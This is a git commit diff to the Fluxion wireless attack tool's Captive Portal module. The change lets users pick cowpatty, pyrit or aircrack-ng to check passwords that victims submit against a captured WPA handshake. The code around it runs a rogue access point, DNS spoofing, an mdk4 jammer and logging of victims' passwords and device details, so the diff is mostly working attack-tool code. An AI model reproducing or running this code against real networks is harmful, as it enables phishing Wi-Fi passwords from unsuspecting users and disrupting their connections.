Added discrete options to authenticator.

The authenticator may now be directed to use one of cowpatty, pyrit, or aircrack-ng, for password verification.
This commit is contained in:
Matias Barcenas 2020-04-26 02:46:05 -05:00
parent 0590dc0b63
commit 597275372b
2 changed files with 90 additions and 82 deletions

View File

@ -8,11 +8,6 @@ CaptivePortalState="Not Ready"
CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog"
CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog"
CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant")
CaptivePortalAuthenticationMethodsInfo=(
"(handshake file, ${CGrn}recommended$CClr)"
) # "(Target AP authentication, slow)")
# ============= < Virtual Network Configuration > ============ #
# To avoid collapsing with an already existing network,
# we'll use a somewhat uncommon network and server IP.
@ -205,7 +200,7 @@ captive_portal_unset_authenticator() {
if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi
case "$CaptivePortalAuthenticatorMode" in
"hash")
"hash"*)
echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;;
esac
@ -214,15 +209,15 @@ captive_portal_unset_authenticator() {
# If we've only got one option, then the user skipped this section
# by auto-selecting that single option, so we unset the previous
# phase along with this one to properly take the user back.
if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
return 1 # Trigger undo chain because it was auto-selected.
fi
#if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then
# return 1 # Trigger undo chain because it was auto-selected.
#fi
}
captive_portal_set_authenticator() {
if [ "$CaptivePortalAuthenticatorMode" ]; then
case "$CaptivePortalAuthenticatorMode" in
"hash")
"hash"*)
if [ "$CaptivePortalHashPath" ]; then
echo "Captive Portal authentication mode is already set, skipping!" \
> $FLUXIONOutputDevice
@ -234,46 +229,47 @@ captive_portal_set_authenticator() {
captive_portal_unset_authenticator
# If we've got only one choice, auto-select it for the user.
if [ \
${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \
"$FLUXIONAuto" ]; then
CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}"
echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \
> $FLUXIONOutputDevice
else
fluxion_header
# # If we've got only one choice, auto-select it for the user.
#if [ \
# ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \
# ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \
# "$FLUXIONAuto" ]; then
# CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}"
# echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \
# > $FLUXIONOutputDevice
#else
fluxion_header
echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
echo
echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
echo
fluxion_target_show
fluxion_target_show
local choices=(
"${CaptivePortalAuthenticationMethods[@]}"
"$FLUXIONGeneralBackOption"
)
io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \
choices[@] CaptivePortalAuthenticationMethodsInfo[@]
local choices=(
"$CaptivePortalVerificationMethodPyritOption"
"$CaptivePortalVerificationMethodCowpattyOption"
"$CaptivePortalVerificationMethodAircrackNG"
"$FLUXIONGeneralBackOption"
)
io_query_choice "" choices[@]
echo
echo
CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}"
CaptivePortalAuthenticatorMode="${IOQueryChoice}"
# If we're going back, reset everything and abort.
if [[ \
"$CaptivePortalAuthenticatorMode" == \
"$FLUXIONGeneralBackOption" ]]; then
captive_portal_unset_authenticator
return -1
fi
# If we're going back, reset everything and abort.
if [[ \
"$CaptivePortalAuthenticatorMode" == \
"$FLUXIONGeneralBackOption" ]]; then
captive_portal_unset_authenticator
return -1
fi
#fi
# Process the authentication method selected.
local result=1 # Assume failure at first.
case "$CaptivePortalAuthenticatorMode" in
"hash")
"hash"*)
# Pass default path if no path is set yet.
if [ ! "$CaptivePortalHashPath" ]; then
CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap"
@ -848,38 +844,34 @@ while [ \$AuthenticatorState = \"running\" ]; do
" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
# 05/26/19: Default to cowpatty for verification since aircrack-ng appears to have a bug.
if which cowpatty &> /dev/null; then
echo "
if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
if cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> /dev/null; then
echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
case "$CaptivePortalAuthenticatorMode" in
# Cowpatty
"$CaptivePortalVerificationMethodCowpattyOption")
local -r verifiedCondition="cowpatty -f \"$FLUXIONWorkspacePath/candidate.txt\" -r \"$CaptivePortalHashPath\" -s \"$FluxionTargetSSID\" &> $FLUXIONOutputDevice"
;;
# Pyrit
"$CaptivePortalVerificationMethodPyritOption")
local -r verifiedCondition="pyrit -r \"$CaptivePortalHashPath\" -i \"$FLUXIONWorkspacePath/candidate.txt\" -b $FluxionTargetMAC attack_passthrough &> $FLUXIONOutputDevice"
;;
sleep 1
break
else
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
fi
fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
else
echo "
if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
# Check if we've got the correct password by looking for anything other than \"Passphrase not in\" or \"KEY NOT FOUND\".
if ! aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\"; then
echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
sleep 1
break
else
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
fi
fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
fi
*)
# Aircrack-ng
# Check if we've got the correct password by looking for
# anything other than \"Passphrase not in\" or \"KEY NOT FOUND\".
local -r verifiedCondition="aircrack-ng -b $FluxionTargetMAC -w \"$FLUXIONWorkspacePath/candidate.txt\" \"$CaptivePortalHashPath\" | egrep -qi \"Passphrase not in|KEY NOT FOUND\""
;;
esac
echo "
if [ -f \"$FLUXIONWorkspacePath/candidate_result.txt\" ]; then
if $verifiedCondition; then
echo \"2\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
sleep 1
break
else
echo \"1\" > \"$FLUXIONWorkspacePath/candidate_result.txt\"
fi
fi" >> "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
fi
local -r staticSSID=$(printf "%q" "$FluxionTargetSSID" | sed -r 's/\\\ / /g' | sed -r "s/\\\'/\'/g")
@ -922,7 +914,7 @@ while [ \$AuthenticatorState = \"running\" ]; do
echo -ne \"\033[K\033[u\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
echo "
sleep 1" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
fi
@ -953,7 +945,7 @@ Mac: $(captive_portal_get_IP_MAC) ($(captive_portal_get_MAC_brand))
IP: $(captive_portal_get_client_IP)
\" >\"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log\"" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
if [ $CaptivePortalAuthenticatorMode = "hash" ]; then
if [[ "$CaptivePortalAuthenticatorMode" = "hash"* ]]; then
# echo "
# aircrack-ng -a 2 -b $FluxionTargetMAC -0 -s \"$CaptivePortalHashPath\" -w \"$FLUXIONWorkspacePath/candidate.txt\" && echo && echo -e \"The password was saved in "$CRed"$CaptivePortalNetLog/$targetSSIDCleanNormalized-$FluxionTargetMAC.log"$CClr"\"\
#" >>"$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
@ -1345,41 +1337,43 @@ save_attack() {
stop_attack() {
# Attempt to find PIDs of any running authenticators.
local authenticatorPID=$(ps a | grep -vE "xterm|grep" | grep captive_portal_authenticator.sh | awk '{print $1}')
#local authenticatorPID=$(pgrep
#local authenticatorPID=$( \
# ps a | grep -vE "xterm|grep" | \
# grep captive_portal_authenticator.sh | awk '{print $1}' \
#)
# Signal any authenticator to stop authentication loop.
if [ "$authenticatorPID" ]; then kill -s SIGABRT $authenticatorPID; fi
fluxion_kill_lineage "--signal SIGABRT" \
"xterm.+captive_portal_authenticator\\.sh"
if [ "$CaptivePortalJammerServiceXtermPID" ]; then
kill $(pgrep -P $CaptivePortalJammerServiceXtermPID \
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
fluxion_kill_lineage $CaptivePortalJammerServiceXtermPID
CaptivePortalJammerServiceXtermPID="" # Clear parent PID
fi
sandbox_remove_workfile "$FLUXIONWorkspacePath/mdk4_blacklist.lst"
# Kill captive portal web server log viewer.
if [ "$CaptivePortalWebServiceXtermPID" ]; then
kill $CaptivePortalWebServiceXtermPID &> $FLUXIONOutputDevice
fluxion_kill_lineage $CaptivePortalWebServiceXtermPID
CaptivePortalWebServiceXtermPID="" # Clear service PID
fi
# Kill captive portal web server.
if [ "$CaptivePortalWebServicePID" ]; then
kill $CaptivePortalWebServicePID &> $FLUXIONOutputDevice
fluxion_kill_lineage $CaptivePortalWebServicePID
CaptivePortalWebServicePID="" # Clear service PID
fi
# Kill DNS service if one is found.
if [ "$CaptivePortalDNSServiceXtermPID" ]; then
kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
fluxion_kill_lineage $CaptivePortalDNSServiceXtermPID
CaptivePortalDNSServiceXtermPID="" # Clear parent PID
fi
# Kill DHCP service.
if [ "$CaptivePortalDHCPServiceXtermPID" ]; then
kill $(pgrep -P $CaptivePortalDHCPServiceXtermPID \
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
fluxion_kill_lineage $CaptivePortalDHCPServiceXtermPID
CaptivePortalDHCPServiceXtermPID="" # Clear parent PID
fi
sandbox_remove_workfile "$FLUXIONWorkspacePath/clients.txt"
@ -1432,6 +1426,8 @@ start_attack() {
"dhcpd -d -f -lf \"$FLUXIONWorkspacePath/dhcpd.leases\" -cf \"$FLUXIONWorkspacePath/dhcpd.conf\" $CaptivePortalAccessInterface 2>&1 | tee -a \"$FLUXIONWorkspacePath/clients.txt\"" &
# Save parent's pid, to get to child later.
CaptivePortalDHCPServiceXtermPID=$!
echo "DHCP Service: $CaptivePortalDHCPServiceXtermPID"
>> $FLUXIONOutputDevice
echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice"
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \
@ -1439,6 +1435,8 @@ start_attack() {
"dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" &
# Save parent's pid, to get to child later.
CaptivePortalDNSServiceXtermPID=$!
echo "DNS Service: $CaptivePortalDNSServiceXtermPID"
>> $FLUXIONOutputDevice
echo -e "$FLUXIONVLine $CaptivePortalStartingWebServiceNotice"
lighttpd -f "$FLUXIONWorkspacePath/lighttpd.conf" \
@ -1449,6 +1447,8 @@ start_attack() {
-title "FLUXION Web Service" -e \
"tail -f \"$FLUXIONWorkspacePath/lighttpd.log\"" &
CaptivePortalWebServiceXtermPID=$!
echo "Web Service: $CaptivePortalWebServiceXtermPID"
>> $FLUXIONOutputDevice
echo -e "$FLUXIONVLine $CaptivePortalStartingJammerServiceNotice"
echo -e "$FluxionTargetMAC" >"$FLUXIONWorkspacePath/mdk4_blacklist.lst"
@ -1482,12 +1482,17 @@ start_attack() {
# Save parent's pid, to get to child later.
CaptivePortalJammerServiceXtermPID=$!
fi
echo "Jammer Service: $CaptivePortalJammerServiceXtermPID"
>> $FLUXIONOutputDevice
echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice"
xterm -hold $TOPRIGHT -bg black -fg "#CCCCCC" \
-title "FLUXION AP Authenticator" \
-e "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" &
local -r authService=$!
echo "Auth Service: $authService"
>> $FLUXIONOutputDevice
}
# FLUXSCRIPT END

View File

@ -19,6 +19,9 @@ CaptivePortalAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommended$CClr
CaptivePortalAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}slow$CClr)"
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
CaptivePortalVerificationMethodQuery="Select a password verification method"
CaptivePortalVerificationMethodPyritOption="hash - pyrit"
CaptivePortalVerificationMethodCowpattyOption="hash - cowpatty"
CaptivePortalVerificationMethodAircrackNG="hash - aircrack-ng (default, ${CYel}unreliable${CClr})"
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
CaptivePortalCertificateSourceQuery="Select SSL certificate source for captive portal."
CaptivePortalCertificateSourceGenerateOption="Create an SSL certificate"